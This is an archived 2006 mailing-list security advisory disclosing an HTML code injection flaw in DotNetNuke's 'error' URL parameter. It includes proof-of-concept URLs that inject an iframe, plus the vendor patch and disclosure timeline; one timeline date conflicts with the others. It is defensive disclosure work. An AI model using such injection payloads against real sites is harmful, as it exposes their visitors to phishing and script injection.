[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060920070850.6732.qmail@mail.superb.net>
Date: Wed, 20 Sep 2006 03:08:49 -0400
From: contact@...ureshapes.com
To: full-disclosure@...ts.grok.org.uk
Subject: DotNetNuke HTML Code Injection
Security Advisory: VULN20-09-2006 -
http://www.secureshapes.com/advisories/vuln20-09-2006.htm
Vendor Security Bulletin:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletin
no3/tabid/990/Default.aspx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DotNetNuke - HTML Code Injection Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Date: 20/09/2006
* Severity: Low
* Impact: Code Injection
* Solution Status: Vendor Patch
* Version: All versions of DotNetNuke
* Vendor Website: http://dotnetnuke.com/
:: ABOUT THE SOFTWARE
DotNetNuke® is an Open Source Framework ideal for creating Enterprise Web
Applications.
Unfortunately, DotNetNuke is vulnerable to HTML code injection.
:: TECHNICAL DESCRIPTION
The error variable available in the URL can be manipulated and it is
possible to inject HTML code.
Example:
http://xxxxxx/Default.aspx?tabid=510&error=The+state+information+is+invalid+
for+this+page+and+might+be+corrupted
It is possible to inject HTML code in that error variable.
In particular, it also possible to reproduce the character "space" inserting
some complete HTML tags such as <script></script> and/or <form></form> in
the injected code. This will allow the attacker to specify attributes in the
HTML tags.
Example:
http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<script></script>/><iframe
<script></script>src=http://www.google.com>
or
http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<form></form>/><iframe<for
m></form>src=http://www.google.com>
In the HTML source code, this injection will result:
<form name="Form" method="post" action="/Default.aspx?tabid=510&error="
/><iframe src=http://www.google.com>" id="Form"
enctype="multipart/form-data" style="height: 100%;">
The space in the HTML code between iframe and src is generated because of
the complete tag injected previously.
:: VENDOR RESPONSE
The vendor security bulletin link is:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletin
no3/tabid/990/Default.aspx
The patches are available here:
http://www.dotnetnuke.com/tabid/125/default.aspx - registration needed in
order to download them
:: DISCLOSURE TIMEFRAME
04/09/2006 - Preliminary Vendor notification.
06/09/2006 - Vulnerability confirmed in all versions
17/06/2006 - DotNetNuke releases version 3.3.5 and 4.3.5 with fix
20/09/2006 - Coordinated public release.
Total Time to Fix: 13 days
:: CREDIT
The vulnerability was discovered by Roberto Suggi Liverani and Antonio Spera
of Secure Shapes.
~~~~~~~~~~~~~~~~~~~
About Secure Shapes
~~~~~~~~~~~~~~~~~~~
Secure Shapes Ltd provides vulnerability assessments , website penetration
testing , network penetration testing and security consultancy.
E-mail: contact [at] secureshapes.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists